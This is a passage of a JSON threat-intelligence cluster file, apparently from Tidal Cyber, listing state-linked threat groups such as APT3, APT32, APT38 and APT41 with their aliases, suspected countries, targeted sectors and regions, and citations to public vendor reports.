Wolf](https://app.tidalcyber.com/references/dbb779c4-4d75-4fb4-ad3a-7d1f0f74e26f)][[Recorded Future APT3 May 2017](https://app.tidalcyber.com/references/a894d79f-5977-4ef9-9aa5-7bfec795ceb2)] This group is responsible for the campaigns known as Operation Clandestine Fox, Operation Clandestine Wolf, and Operation Double Tap.[[FireEye Clandestine Wolf](https://app.tidalcyber.com/references/dbb779c4-4d75-4fb4-ad3a-7d1f0f74e26f)][[FireEye Operation Double Tap](https://app.tidalcyber.com/references/4b9af128-98da-48b6-95c7-8d27979c2ab1)] As of June 2015, the group appears to have shifted from targeting primarily US victims to primarily political organizations in Hong Kong.[[Symantec Buckeye](https://app.tidalcyber.com/references/dbf3ce3e-bcf2-4e47-ad42-839e51967395)]\n\nIn 2017, MITRE developed an APT3 Adversary Emulation Plan.[[APT3 Adversary Emulation Plan](https://app.tidalcyber.com/references/64c01921-c33f-402e-b30d-a2ba26583a24)]", + "meta": { + "country": "CN", + "group_attack_id": "G0022", + "observed_countries": [ + "BE", + "HK", + "IT", + "LU", + "PH", + "SE", + "GB", + "US", + "VN" + ], + "observed_motivations": [], + "source": "MITRE", + "tags": [], + "target_categories": [] + }, + "related": [ + { + "dest-uuid": "d447bfdc-0a5c-4651-9070-2b3b87ac2128", + "type": "similar" + }, + { + "dest-uuid": "feff078c-cd96-4e56-90a7-4310ae8e48cb", + "type": "similar" + }, + { + "dest-uuid": "bceffa47-b63a-4ebf-bded-33cb633c5ea7", + "type": "similar" + }, + { + "dest-uuid": "4149bb91-e34b-4d22-80f1-e8adfab0d17f", + "type": "similar" + }, + { + "dest-uuid": "9eac64b2-f6ac-4a34-98c9-b159337fbea8", + "type": "similar" + }, + { + "dest-uuid": "a62a6f94-d301-4cf8-b67e-662fd7f91d73", + "type": "similar" + } + ], + "uuid": "9da726e6-af02-49b8-8ebe-7ea4235513c9", + "value": "APT3" + }, + { + "description": "[APT30](https://app.tidalcyber.com/groups/be45ff95-6c74-4000-bc39-63044673d82f) is a threat group suspected to be associated with the Chinese government. While [Naikon](https://app.tidalcyber.com/groups/a80c00b2-b8b6-4780-99bb-df8fe921947d) shares some characteristics with [APT30](https://app.tidalcyber.com/groups/be45ff95-6c74-4000-bc39-63044673d82f), the two groups do not appear to be exact matches.[[FireEye APT30](https://app.tidalcyber.com/references/c48d2084-61cf-4e86-8072-01e5d2de8416)][[Baumgartner Golovkin Naikon 2015](https://app.tidalcyber.com/references/5163576f-0b2c-49ba-8f34-b7efe3f3f6db)]", + "meta": { + "country": "CN", + "group_attack_id": "G0013", + "observed_countries": [ + "BT", + "BN", + "KH", + "IN", + "ID", + "JP", + "KR", + "LA", + "MY", + "MM", + "NP", + "PH", + "SA", + "SG", + "TH", + "US", + "VN" + ], + "observed_motivations": [ + "Cyber Espionage" + ], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Government", + "Media" + ] + }, + "related": [ + { + "dest-uuid": "2f1fd017-9df6-4759-91fb-e7039609b5ff", + "type": "similar" + } + ], + "uuid": "be45ff95-6c74-4000-bc39-63044673d82f", + "value": "APT30" + }, + { + "description": "[[FireEye APT32 May 2017](https://app.tidalcyber.com/references/b72d017b-a70f-4003-b3d9-90d79aca812d)][[Volexity OceanLotus Nov 2017](https://app.tidalcyber.com/references/ed9f5545-377f-4a12-92e4-c0439cc5b037)][[Cybereason Oceanlotus May 2017](https://app.tidalcyber.com/references/1ef3025b-d4a9-49aa-b744-2dbea10a0abf)][[ESET OceanLotus Mar 2019](https://app.tidalcyber.com/references/b2745f5c-a181-48e1-b1cf-37a1ffe1fdf0)][[Amnesty Intl. Ocean Lotus February 2021](https://app.tidalcyber.com/references/a54a2f68-8406-43ab-8758-07edd49dfb83)]", + "meta": { + "id": "44190852-882a-4342-a5c8-f02ca889a229" + }, + "related": [ + { + "dest-uuid": "c0fe9859-e8de-4ce1-bc3c-b489e914a145", + "type": "similar" + } + ], + "uuid": "60ed0464-1075-4f6d-b72d-4aaa2892d2c9", + "value": "OceanLotus" + }, + { + "description": "[[ESET OceanLotus](https://app.tidalcyber.com/references/a7bcbaca-10c1-403a-9eb5-f111af1cbf6a)][[Cybereason Oceanlotus May 2017](https://app.tidalcyber.com/references/1ef3025b-d4a9-49aa-b744-2dbea10a0abf)][[ESET OceanLotus Mar 2019](https://app.tidalcyber.com/references/b2745f5c-a181-48e1-b1cf-37a1ffe1fdf0)][[Amnesty Intl. Ocean Lotus February 2021](https://app.tidalcyber.com/references/a54a2f68-8406-43ab-8758-07edd49dfb83)]", + "meta": { + "id": "9a219fab-e9e1-4f04-98ef-baeb7710139d" + }, + "related": [ + { + "dest-uuid": "c0fe9859-e8de-4ce1-bc3c-b489e914a145", + "type": "similar" + } + ], + "uuid": "6be3ad40-e776-4127-81d2-c24a7e2b6778", + "value": "APT-C-00" + }, + { + "description": "[[Cybereason Oceanlotus May 2017](https://app.tidalcyber.com/references/1ef3025b-d4a9-49aa-b744-2dbea10a0abf)]", + "meta": { + "id": "3666201a-e438-4c28-b130-b4dfe67854c2" + }, + "related": [ + { + "dest-uuid": "c0fe9859-e8de-4ce1-bc3c-b489e914a145", + "type": "similar" + } + ], + "uuid": "510b8ec4-efad-41e0-8f0b-68c70a3d92e0", + "value": "SeaLotus" + }, + { + "description": "[APT32](https://app.tidalcyber.com/groups/c0fe9859-e8de-4ce1-bc3c-b489e914a145) is a suspected Vietnam-based threat group that has been active since at least 2014. The group has targeted multiple private sector industries as well as foreign governments, dissidents, and journalists with a strong focus on Southeast Asian countries like Vietnam, the Philippines, Laos, and Cambodia. They have extensively used strategic web compromises to compromise victims.[[FireEye APT32 May 2017](https://app.tidalcyber.com/references/b72d017b-a70f-4003-b3d9-90d79aca812d)][[Volexity OceanLotus Nov 2017](https://app.tidalcyber.com/references/ed9f5545-377f-4a12-92e4-c0439cc5b037)][[ESET OceanLotus](https://app.tidalcyber.com/references/a7bcbaca-10c1-403a-9eb5-f111af1cbf6a)]", + "meta": { + "country": "VN", + "group_attack_id": "G0050", + "observed_countries": [ + "KH", + "CN", + "DE", + "LA", + "PH", + "US", + "VN" + ], + "observed_motivations": [], + "source": "MITRE", + "tags": [ + "115113f0-5876-4aa5-b731-5ad46f60c069" + ], + "target_categories": [ + "Automotive", + "Energy", + "Entertainment", + "Financial Services", + "Government", + "Hospitality Leisure", + "Insurance", + "Manufacturing", + "Media", + "NGOs", + "Non Profit", + "Retail", + "Technology" + ] + }, + "related": [ + { + "dest-uuid": "aa29ae56-e54b-47a2-ad16-d3ab0242d5d7", + "type": "similar" + }, + { + "dest-uuid": "60ed0464-1075-4f6d-b72d-4aaa2892d2c9", + "type": "similar" + }, + { + "dest-uuid": "6be3ad40-e776-4127-81d2-c24a7e2b6778", + "type": "similar" + }, + { + "dest-uuid": "510b8ec4-efad-41e0-8f0b-68c70a3d92e0", + "type": "similar" + } + ], + "uuid": "c0fe9859-e8de-4ce1-bc3c-b489e914a145", + "value": "APT32" + }, + { + "description": "[[Microsoft Holmium June 2020](https://app.tidalcyber.com/references/c249bfcf-25c4-4502-b5a4-17783d581163)]", + "meta": { + "id": "a7af6a75-ed87-42d6-a011-92ab54eb977c" + }, + "related": [ + { + "dest-uuid": "99bbbe25-45af-492f-a7ff-7cbc57828bac", + "type": "similar" + } + ], + "uuid": "51ec6111-08b2-4294-a3a6-6d3f04161b62", + "value": "HOLMIUM" + }, + { + "description": "[[Symantec Elfin Mar 2019](https://app.tidalcyber.com/references/55671ede-f309-4924-a1b4-3d597517b27e)]", + "meta": { + "id": "36a6c829-fbff-4c14-bb51-749cb5850af8" + }, + "related": [ + { + "dest-uuid": "99bbbe25-45af-492f-a7ff-7cbc57828bac", + "type": "similar" + } + ], + "uuid": "b757d8cd-0b22-4604-81a6-1cd3dd53084c", + "value": "Elfin" + }, + { + "description": "[[Microsoft Peach Sandstorm September 14 2023](/references/98a631f4-4b95-4159-b311-dee1216ec208)]", + "meta": { + "id": "4526a53c-a0c4-4554-8d6c-c30f1a5db7a0", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "99bbbe25-45af-492f-a7ff-7cbc57828bac", + "type": "similar" + } + ], + "uuid": "5d178cb0-a072-4b2f-9c28-13642fb30c03", + "value": "Peach Sandstorm" + }, + { + "description": "[APT33](https://app.tidalcyber.com/groups/99bbbe25-45af-492f-a7ff-7cbc57828bac) is a suspected Iranian threat group that has carried out operations since at least 2013. The group has targeted organizations across multiple industries in the United States, Saudi Arabia, and South Korea, with a particular interest in the aviation and energy sectors. [[FireEye APT33 Sept 2017](https://app.tidalcyber.com/references/70610469-db0d-45ab-a790-6e56309a39ec)] [[FireEye APT33 Webinar Sept 2017](https://app.tidalcyber.com/references/9b378592-5737-403d-8a07-27077f5b2d61)]", + "meta": { + "country": "IR", + "group_attack_id": "G0064", + "observed_countries": [ + "IR", + "IQ", + "IL", + "KR", + "SA", + "GB", + "US" + ], + "observed_motivations": [ + "Cyber Espionage" + ], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Aerospace", + "Energy" + ] + }, + "related": [ + { + "dest-uuid": "4f69ec6d-cb6b-42af-b8e2-920a2aa4be10", + "type": "similar" + }, + { + "dest-uuid": "51ec6111-08b2-4294-a3a6-6d3f04161b62", + "type": "similar" + }, + { + "dest-uuid": "b757d8cd-0b22-4604-81a6-1cd3dd53084c", + "type": "similar" + }, + { + "dest-uuid": "5d178cb0-a072-4b2f-9c28-13642fb30c03", + "type": "similar" + } + ], + "uuid": "99bbbe25-45af-492f-a7ff-7cbc57828bac", + "value": "APT33" + }, + { + "description": "[[Volexity InkySquid BLUELIGHT August 2021](https://app.tidalcyber.com/references/7e394434-364f-4e50-9a96-3e75dacc9866)]", + "meta": { + "id": "95339824-c45f-45f9-9cc7-ee155ee0adff" + }, + "related": [ + { + "dest-uuid": "013fdfdc-aa32-4779-8f6e-7920615cbf66", + "type": "similar" + } + ], + "uuid": "81c1b801-4fc4-4602-89c0-91f59afd3f67", + "value": "InkySquid" + }, + { + "description": "[[Securelist ScarCruft Jun 2016](https://app.tidalcyber.com/references/04961952-9bac-48f3-adc7-40a3a2bcee84)][[FireEye APT37 Feb 2018](https://app.tidalcyber.com/references/4d575c1a-4ff9-49ce-97cd-f9d0637c2271)][[Securelist ScarCruft May 2019](https://app.tidalcyber.com/references/2dd5b872-a4ab-4b77-8457-a3d947298fc0)]", + "meta": { + "id": "97656f0d-503e-4c1a-b13d-e3234bc03039" + }, + "related": [ + { + "dest-uuid": "013fdfdc-aa32-4779-8f6e-7920615cbf66", + "type": "similar" + } + ], + "uuid": "83962063-25d5-498b-8d40-168df6e8e85a", + "value": "ScarCruft" + }, + { + "description": "[[FireEye APT37 Feb 2018](https://app.tidalcyber.com/references/4d575c1a-4ff9-49ce-97cd-f9d0637c2271)]", + "meta": { + "id": "03c73305-1b06-4c25-9ccf-79882636896a" + }, + "related": [ + { + "dest-uuid": "013fdfdc-aa32-4779-8f6e-7920615cbf66", + "type": "similar" + } + ], + "uuid": "0e5a5a21-ca65-4b92-91d8-c6ffe8d39dd8", + "value": "Reaper" + }, + { + "description": "[[FireEye APT37 Feb 2018](https://app.tidalcyber.com/references/4d575c1a-4ff9-49ce-97cd-f9d0637c2271)]", + "meta": { + "id": "254122d6-138a-4a88-ac3e-529ecdc3903e" + }, + "related": [ + { + "dest-uuid": "013fdfdc-aa32-4779-8f6e-7920615cbf66", + "type": "similar" + } + ], + "uuid": "1cbfa64f-c394-402f-9c1f-d66e33b2b2f7", + "value": "Group123" + }, + { + "description": "[[FireEye APT37 Feb 2018](https://app.tidalcyber.com/references/4d575c1a-4ff9-49ce-97cd-f9d0637c2271)]", + "meta": { + "id": "3e47382e-8271-42c3-ae3e-cf1cd3e2a158" + }, + "related": [ + { + "dest-uuid": "013fdfdc-aa32-4779-8f6e-7920615cbf66", + "type": "similar" + } + ], + "uuid": "66d651c2-e379-45a4-a7eb-4e838f8b2819", + "value": "TEMP.Reaper" + }, + { + "description": "[[CrowdStrike Richochet Chollima September 2021](https://app.tidalcyber.com/references/69a23467-c55c-43a3-951d-c208e6ead6f7)]", + "meta": { + "id": "e8f786f6-7d73-5703-923b-e35d928b9b63" + }, + "related": [ + { + "dest-uuid": "013fdfdc-aa32-4779-8f6e-7920615cbf66", + "type": "similar" + } + ], + "uuid": "62533eef-3762-5920-b3da-392fcd2d4d02", + "value": "Ricochet Chollima" + }, + { + "description": "[APT37](https://app.tidalcyber.com/groups/013fdfdc-aa32-4779-8f6e-7920615cbf66) is a North Korean state-sponsored cyber espionage group that has been active since at least 2012. The group has targeted victims primarily in South Korea, but also in Japan, Vietnam, Russia, Nepal, China, India, Romania, Kuwait, and other parts of the Middle East. [APT37](https://app.tidalcyber.com/groups/013fdfdc-aa32-4779-8f6e-7920615cbf66) has also been linked to the following campaigns between 2016-2018: Operation Daybreak, Operation Erebus, Golden Time, Evil New Year, Are you Happy?, FreeMilk, North Korean Human Rights, and Evil New Year 2018.[[FireEye APT37 Feb 2018](https://app.tidalcyber.com/references/4d575c1a-4ff9-49ce-97cd-f9d0637c2271)][[Securelist ScarCruft Jun 2016](https://app.tidalcyber.com/references/04961952-9bac-48f3-adc7-40a3a2bcee84)][[Talos Group123](https://app.tidalcyber.com/references/bf8b2bf0-cca3-437b-a640-715f9cc945f7)]\n\nNorth Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) instead of tracking clusters or subgroups.", + "meta": { + "country": "KP", + "group_attack_id": "G0067", + "observed_countries": [ + "CN", + "IN", + "JP", + "KR", + "KW", + "NP", + "RO", + "RU", + "VN" + ], + "observed_motivations": [], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Aerospace", + "Automotive", + "Education", + "Financial Services", + "Government", + "Healthcare", + "Human Rights", + "Manufacturing", + "Media", + "NGOs", + "Technology" + ] + }, + "related": [ + { + "dest-uuid": "50cd027f-df14-40b2-aa22-bf5de5061163", + "type": "similar" + }, + { + "dest-uuid": "81c1b801-4fc4-4602-89c0-91f59afd3f67", + "type": "similar" + }, + { + "dest-uuid": "83962063-25d5-498b-8d40-168df6e8e85a", + "type": "similar" + }, + { + "dest-uuid": "0e5a5a21-ca65-4b92-91d8-c6ffe8d39dd8", + "type": "similar" + }, + { + "dest-uuid": "1cbfa64f-c394-402f-9c1f-d66e33b2b2f7", + "type": "similar" + }, + { + "dest-uuid": "66d651c2-e379-45a4-a7eb-4e838f8b2819", + "type": "similar" + }, + { + "dest-uuid": "62533eef-3762-5920-b3da-392fcd2d4d02", + "type": "similar" + } + ], + "uuid": "013fdfdc-aa32-4779-8f6e-7920615cbf66", + "value": "APT37" + }, + { + "description": "[[CrowdStrike Stardust Chollima Profile April 2018](https://app.tidalcyber.com/references/a0119ad4-ceea-4dba-bc08-a682085a9b27)][[CrowdStrike GTR 2021 June 2021](https://app.tidalcyber.com/references/ec58e524-6de5-4cbb-a5d3-984b9b652f26)]", + "meta": { + "id": "9ebcd096-5e63-48f1-9a67-d80859a8fcc5" + }, + "related": [ + { + "dest-uuid": "dfbce236-735c-436d-b433-933bd6eae17b", + "type": "similar" + } + ], + "uuid": "dd64bbe7-4d35-4622-a92f-23255765c525", + "value": "Stardust Chollima" + }, + { + "description": "[[SecureWorks NICKEL GLADSTONE profile Sept 2021](https://app.tidalcyber.com/references/c78a8379-04a4-4558-820d-831ad4f267fd)]", + "meta": { + "id": "df049954-1069-4ccc-8491-19c279452c1d" + }, + "related": [ + { + "dest-uuid": "dfbce236-735c-436d-b433-933bd6eae17b", + "type": "similar" + } + ], + "uuid": "25b6512f-c60e-480f-81a0-c2ec4ba31ac8", + "value": "NICKEL GLADSTONE" + }, + { + "description": "[[CISA AA20-239A BeagleBoyz August 2020](https://app.tidalcyber.com/references/a8a2e3f2-3967-4e82-a36a-2436c654fb3f)]", + "meta": { + "id": "ba2dea9a-8870-4c63-a164-1fb2cc270edf" + }, + "related": [ + { + "dest-uuid": "dfbce236-735c-436d-b433-933bd6eae17b", + "type": "similar" + } + ], + "uuid": "b8b8afb0-04b2-41b3-b756-d652b65c530d", + "value": "BeagleBoyz" + }, + { + "description": "[[Kaspersky Lazarus Under The Hood Blog 2017](https://app.tidalcyber.com/references/a1e1ab6a-8db0-4593-95ec-78784607dfa0)]", + "meta": { + "id": "4e2a5cca-f160-4ca7-a9bf-e2232436aef1" + }, + "related": [ + { + "dest-uuid": "dfbce236-735c-436d-b433-933bd6eae17b", + "type": "similar" + } + ], + "uuid": "cf196249-7d25-4d5a-b2c9-2b34f045feba", + "value": "Bluenoroff" + }, + { + "description": "[APT38](https://app.tidalcyber.com/groups/dfbce236-735c-436d-b433-933bd6eae17b) is a North Korean state-sponsored threat group that specializes in financial cyber operations; it has been attributed to the Reconnaissance General Bureau.[[CISA AA20-239A BeagleBoyz August 2020](https://app.tidalcyber.com/references/a8a2e3f2-3967-4e82-a36a-2436c654fb3f)] Active since at least 2014, [APT38](https://app.tidalcyber.com/groups/dfbce236-735c-436d-b433-933bd6eae17b) has targeted banks, financial institutions, casinos, cryptocurrency exchanges, SWIFT system endpoints, and ATMs in at least 38 countries worldwide. Significant operations include the 2016 Bank of Bangladesh heist, during which [APT38](https://app.tidalcyber.com/groups/dfbce236-735c-436d-b433-933bd6eae17b) stole $81 million, as well as attacks against Bancomext (2018) and Banco de Chile (2018); some of their attacks have been destructive.[[CISA AA20-239A BeagleBoyz August 2020](https://app.tidalcyber.com/references/a8a2e3f2-3967-4e82-a36a-2436c654fb3f)][[FireEye APT38 Oct 2018](https://app.tidalcyber.com/references/7c916329-af56-4723-820c-ef932a6e3409)][[DOJ North Korea Indictment Feb 2021](https://app.tidalcyber.com/references/d702653f-a9da-4a36-8f84-97caeb445266)][[Kaspersky Lazarus Under The Hood Blog 2017](https://app.tidalcyber.com/references/a1e1ab6a-8db0-4593-95ec-78784607dfa0)]\n\nNorth Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) instead of tracking clusters or subgroups.", + "meta": { + "country": "KP", + "group_attack_id": "G0082", + "observed_countries": [ + "AR", + "BD", + "BA", + "BR", + "BG", + "CL", + "CR", + "EC", + "GH", + "IN", + "ID", + "JP", + "JO", + "KE", + "KR", + "KW", + "MY", + "MT", + "MX", + "MZ", + "NP", + "NI", + "NG", + "PK", + "PA", + "PE", + "PH", + "PL", + "RU", + "SG", + "ZA", + "ES", + "TW", + "TZ", + "TG", + "TR", + "UG", + "US", + "UY", + "VN", + "ZM" + ], + "observed_motivations": [ + "Financial Gain" + ], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Banks", + "Casinos Gambling", + "Credit Unions", + "Financial Services", + "Government", + "Hospitality Leisure", + "Media" + ] + }, + "related": [ + { + "dest-uuid": "68391641-859f-4a9a-9a1e-3e5cf71ec376", + "type": "similar" + }, + { + "dest-uuid": "dd64bbe7-4d35-4622-a92f-23255765c525", + "type": "similar" + }, + { + "dest-uuid": "25b6512f-c60e-480f-81a0-c2ec4ba31ac8", + "type": "similar" + }, + { + "dest-uuid": "b8b8afb0-04b2-41b3-b756-d652b65c530d", + "type": "similar" + }, + { + "dest-uuid": "cf196249-7d25-4d5a-b2c9-2b34f045feba", + "type": "similar" + } + ], + "uuid": "dfbce236-735c-436d-b433-933bd6eae17b", + "value": "APT38" + }, + { + "description": "[[FBI FLASH APT39 September 2020](https://app.tidalcyber.com/references/76869199-e9fa-41b4-b045-41015e6daaec)][[Dept. of Treasury Iran Sanctions September 2020](https://app.tidalcyber.com/references/0c8ff80a-6b1d-4212-aa40-99aeef04ce05)][[DOJ Iran Indictments September 2020](https://app.tidalcyber.com/references/f30a77dd-d1d0-41b8-b82a-461dd6cd126f)]", + "meta": { + "id": "0d240614-12ee-43dd-bebb-81e485f62c6b" + }, + "related": [ + { + "dest-uuid": "a57b52c7-9f64-4ffe-a7c3-0de738fb2af1", + "type": "similar" + } + ], + "uuid": "6ca4e51d-aa35-4a77-b3ba-7eb8634808f7", + "value": "ITG07" + }, + { + "description": "Activities associated with APT39 largely align with a group publicly referred to as Chafer.[[FireEye APT39 Jan 2019](https://app.tidalcyber.com/references/ba366cfc-cc04-41a5-903b-a7bb73136bc3)][[Symantec Chafer Dec 2015](https://app.tidalcyber.com/references/0a6166a3-5649-4117-97f4-7b8b5b559929)][[Dark Reading APT39 JAN 2019](https://app.tidalcyber.com/references/b310dfa4-f4ee-4a0c-82af-b0fdef1a1f58)][[FBI FLASH APT39 September 2020](https://app.tidalcyber.com/references/76869199-e9fa-41b4-b045-41015e6daaec)][[Dept. of Treasury Iran Sanctions September 2020](https://app.tidalcyber.com/references/0c8ff80a-6b1d-4212-aa40-99aeef04ce05)][[DOJ Iran Indictments September 2020](https://app.tidalcyber.com/references/f30a77dd-d1d0-41b8-b82a-461dd6cd126f)]", + "meta": { + "id": "704993e6-2034-4ca1-bba0-53bd8dbd174c" + }, + "related": [ + { + "dest-uuid": "a57b52c7-9f64-4ffe-a7c3-0de738fb2af1", + "type": "similar" + } + ], + "uuid": "d9944d22-b092-4f28-a27d-328d77ad7790", + "value": "Chafer" + }, + { + "description": "[[Crowdstrike GTR2020 Mar 2020](https://app.tidalcyber.com/references/a2325ace-e5a1-458d-80c1-5037bd7fa727)]", + "meta": { + "id": "502e332b-f839-45bc-a2e1-9832af325c42" + }, + "related": [ + { + "dest-uuid": "a57b52c7-9f64-4ffe-a7c3-0de738fb2af1", + "type": "similar" + } + ], + "uuid": "94ad9c24-d673-4f4c-8d3d-eb57a3d6aa6a", + "value": "Remix Kitten" + }, + { + "description": "[APT39](https://app.tidalcyber.com/groups/a57b52c7-9f64-4ffe-a7c3-0de738fb2af1) is one of several names for cyber espionage activity conducted by the Iranian Ministry of Intelligence and Security (MOIS) through the front company Rana Intelligence Computing since at least 2014. [APT39](https://app.tidalcyber.com/groups/a57b52c7-9f64-4ffe-a7c3-0de738fb2af1) has primarily targeted the travel, hospitality, academic, and telecommunications industries in Iran and across Asia, Africa, Europe, and North America to track individuals and entities considered to be a threat by the MOIS.[[FireEye APT39 Jan 2019](https://app.tidalcyber.com/references/ba366cfc-cc04-41a5-903b-a7bb73136bc3)][[Symantec Chafer Dec 2015](https://app.tidalcyber.com/references/0a6166a3-5649-4117-97f4-7b8b5b559929)][[FBI FLASH APT39 September 2020](https://app.tidalcyber.com/references/76869199-e9fa-41b4-b045-41015e6daaec)][[Dept. of Treasury Iran Sanctions September 2020](https://app.tidalcyber.com/references/0c8ff80a-6b1d-4212-aa40-99aeef04ce05)][[DOJ Iran Indictments September 2020](https://app.tidalcyber.com/references/f30a77dd-d1d0-41b8-b82a-461dd6cd126f)]", + "meta": { + "country": "IR", + "group_attack_id": "G0087", + "observed_countries": [ + "IL", + "JO", + "KW", + "SA", + "ES", + "TR", + "AE", + "US" + ], + "observed_motivations": [], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Education", + "Hospitality Leisure", + "Telecommunications", + "Travel Services" + ] + }, + "related": [ + { + "dest-uuid": "c2c64bd3-a325-446f-91a8-b4c0f173a30b", + "type": "similar" + }, + { + "dest-uuid": "6ca4e51d-aa35-4a77-b3ba-7eb8634808f7", + "type": "similar" + }, + { + "dest-uuid": "d9944d22-b092-4f28-a27d-328d77ad7790", + "type": "similar" + }, + { + "dest-uuid": "94ad9c24-d673-4f4c-8d3d-eb57a3d6aa6a", + "type": "similar" + } + ], + "uuid": "a57b52c7-9f64-4ffe-a7c3-0de738fb2af1", + "value": "APT39" + }, + { + "description": "[[Crowdstrike GTR2020 Mar 2020](https://app.tidalcyber.com/references/a2325ace-e5a1-458d-80c1-5037bd7fa727)]", + "meta": { + "id": "152c96c0-7f83-4104-9f5f-b73487734fad" + }, + "related": [ + { + "dest-uuid": "502223ee-8947-42f8-a532-a3b3da12b7d9", + "type": "similar" + } + ], + "uuid": "160cc195-b382-4bb1-807c-2e1592fbe105", + "value": "Wicked Panda" + }, + { + "description": "[APT41](https://app.tidalcyber.com/groups/502223ee-8947-42f8-a532-a3b3da12b7d9) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://app.tidalcyber.com/groups/502223ee-8947-42f8-a532-a3b3da12b7d9) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://app.tidalcyber.com/groups/502223ee-8947-42f8-a532-a3b3da12b7d9) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://app.tidalcyber.com/groups/6932662a-53a7-4e43-877f-6e940e2d744b).[[FireEye APT41 Aug 2019](https://app.tidalcyber.com/references/20f8e252-0a95-4ebd-857c-d05b0cde0904)][[Group IB APT 41 June 2021](https://app.tidalcyber.com/references/a2bf43a0-c7da-4cb9-8f9a-b34fac92b625)]\n", + "meta": { + "country": "CN", + "group_attack_id": "G0096", + "observed_countries": [ + "AU", + "BH", + "BR", + "CA", + "CL", + "DK", + "FI", + "FR", + "GE", + "HK", + "IN", + "ID", + "IT", + "JP", + "KR", + "MY", + "MX", + "MM", + "NL", + "PK", + "PH", + "PL", + "QA", + "SA", + "SG", + "ZA", + "SE", + "CH", + "TW", + "TH", + "TR", + "AE", + "GB", + "US", + "VN" + ], + "observed_motivations": [ + "Cyber Espionage", + "Financial Gain" + ], + "source": "MITRE", + "tags": [ + "f2ae2283-f94d-4f8f-bbde-43f2bed66c55", + "a98d7a43-f227-478e-81de-e7299639a355" + ], + "target_categories": [ + "Aerospace", + "Automotive", + "Education", + "Energy", + "Financial Services", + "Healthcare", + "High Tech", + "Media", + "Pharmaceuticals", + "Retail", + "Telecommunications", + "Travel Services", + "Video Games" + ] + }, + "related": [ + { + "dest-uuid": "9c124874-042d-48cd-b72b-ccdc51ecbbd6", + "type": "similar" + }, + { + "dest-uuid": "160cc195-b382-4bb1-807c-2e1592fbe105", + "type": "similar" + } + ], + "uuid": "502223ee-8947-42f8-a532-a3b3da12b7d9", + "value": "APT41" + }, + { + "description": "[[QiAnXin APT-C-36 Feb2019](https://app.tidalcyber.com/references/cae075ea-42cb-4695-ac66-9187241393d1)]", + "meta": { + "id": "c42ea733-327b-447b-b530-b5eb87fb98d5" + }, + "related": [ + { + "dest-uuid": "153c14a6-31b7-44f2-892e-6d9fdc152267", + "type": "similar" + } + ], + "uuid": "3a48eb6e-2b44-4004-af10-459f5ee4352a", + "value": "Blind Eagle" + }, + { + "description": "[APT-C-36](https://app.tidalcyber.com/groups/153c14a6-31b7-44f2-892e-6d9fdc152267) is a suspected South America espionage group that has been active since at least 2018. The group mainly targets Colombian government institutions as well as important corporations in the financial sector, petroleum industry, and professional manufacturing.[[QiAnXin APT-C-36 Feb2019](https://app.tidalcyber.com/references/cae075ea-42cb-4695-ac66-9187241393d1)]", + "meta": { + "group_attack_id": "G0099", + "observed_countries": [ + "CO" + ], + "observed_motivations": [], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Banks", + "Energy", + "Financial Services", + "Government", + "Manufacturing" + ] + }, + "related": [ + { + "dest-uuid": "3a48eb6e-2b44-4004-af10-459f5ee4352a", + "type": "similar" + } + ], + "uuid": "153c14a6-31b7-44f2-892e-6d9fdc152267", + "value": "APT-C-36" + }, + { + "description": "[Aquatic Panda](https://app.tidalcyber.com/groups/b8a349a6-cde1-4d95-b20f-44c62bbfc786) is a suspected China-based threat group with a dual mission of intelligence collection and industrial espionage. Active since at least May 2020, [Aquatic Panda](https://app.tidalcyber.com/groups/b8a349a6-cde1-4d95-b20f-44c62bbfc786) has primarily targeted entities in the telecommunications, technology, and government sectors.[[CrowdStrike AQUATIC PANDA December 2021](https://app.tidalcyber.com/references/fd095ef2-6fc2-4f6f-9e4f-037b2a9217d2)]", + "meta": { + "country": "CN", + "group_attack_id": "G0143", + "observed_countries": [], + "observed_motivations": [ + "Cyber Espionage" + ], + "source": "MITRE", + "tags": [], + "target_categories": [ + "Government", + "Technology", + "Telecommunications" + ] + }, + "related": [], + "uuid": "b8a349a6-cde1-4d95-b20f-44c62bbfc786", + "value": "Aquatic Panda" + }, + { + "description": "[[Cisco Group 72](https://app.tidalcyber.com/references/b9201737-ef72-46d4-8e86-89fee5b98aa8)]", + "meta": { + "id": "61037820-7b66-46bf-8bfd-06cdb81e9b52" + }, + "related": [ + { + "dest-uuid": "90f4d3f9-3fe3-4a64-8dc1-172c6d037dca", + "type": "similar" + } + ], + "uuid": "a975effb-1b65-4dd5-85ba-b0d12d94b7a8", + "value": "Group 72" + }, + { + "description": "[Axiom](https://app.tidalcyber.com/groups/90f4d3f9-3fe3-4a64-8dc1-172c6d037dca) is a suspected Chinese cyber espionage group that has targeted the aerospace, defense, government, manufacturing, and media sectors since at least 2008. Some reporting suggests a degree of overlap between [Axiom](https://app.tidalcyber.com/groups/90f4d3f9-3fe3-4a64-8dc1-172c6d037dca) and [Winnti Group](https://app.tidalcyber.com/groups/6932662a-53a7-4e43-877f-6e940e2d744b) but the two groups appear to be distinct based on differences in reporting on TTPs and targeting.[[Kaspersky Winnti April 2013](https://app.tidalcyber.com/references/2d4834b9-61c4-478e-919a-317d97cd2c36)][[Kaspersky Winnti June 2015](https://app.tidalcyber.com/references/86504950-0f4f-42bc-b003-24f60ae97c99)][[Novetta Winnti April 2015](https://app.tidalcyber.com/references/cbe8373b-f14b-4890-99fd-35ffd7090dea)]", + "meta": { + "country": "CN", + "group_attack_id": "G0001", + "observed_countries": [ + "JP", + "KR", + "TW", + "US" + ], + "observed_motivations": [ + "Cyber Espionage" + ], + "source": "MITRE", + "tags": [], + "target_categories": [ + 